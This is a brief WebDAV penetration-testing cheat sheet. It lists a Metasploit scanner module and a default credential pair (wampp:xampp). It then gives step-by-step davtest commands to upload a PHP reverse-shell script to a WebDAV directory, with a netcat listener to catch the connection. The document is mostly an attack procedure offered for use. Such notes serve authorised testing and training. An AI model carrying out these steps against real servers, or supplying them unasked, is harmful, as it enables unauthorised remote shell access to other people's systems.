WebDAV Pentesting

WebDAV is a set of extensions to the Hypertext Transfer Protocol, which allows user agents to collaboratively author contents directly in an HTTP web server.

Enumeration

msfconsole
msf> use auxiliary/scanner/http/webdav_scanner

Default Credentials

wampp:xampp

Reverse Shell

1. Check if the exploit can be uploaded

davtest -url http://example.com/davdir -auth 'user:pass'

2. Upload the Reverse Shell Script

If we can upload the file e.g. PHP file, upload the script for reverse shell.

davtest -url http://example.com/davdir -auth 'user:pass' -uploadfile shell.php -uploadloc shell.php

3. Get a Shell

In local machine, start listener for getting a shell.

nc -lvnp 4444

Now access to http://example.com/davdir/shell.php.
We should get a shell.